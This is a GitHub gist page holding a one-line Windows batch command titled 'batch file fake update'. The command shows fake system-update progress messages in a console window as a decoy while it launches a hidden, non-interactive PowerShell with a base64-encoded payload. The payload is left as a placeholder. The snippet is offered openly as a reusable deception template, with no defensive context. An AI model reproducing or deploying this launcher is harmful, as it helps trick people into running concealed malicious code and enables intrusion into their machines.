Skip to content

Instantly share code, notes, and snippets.

@gabemarshall
Created April 29, 2015 14:25
Show Gist options
  • Save gabemarshall/976839809ac99f30e08b to your computer and use it in GitHub Desktop.
Save gabemarshall/976839809ac99f30e08b to your computer and use it in GitHub Desktop.
batch file fake update
start cmd.exe @cmd /k "echo Installing system updates.. && timeout 3 >nul && echo Finalizing installation.. && timeout 3 >nul && echo Updates Complete! && timeout 1 >nul && taskkill /IM cmd.exe" & powershell -nop -win hidden -noni -enc <base64 encoded payload here>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment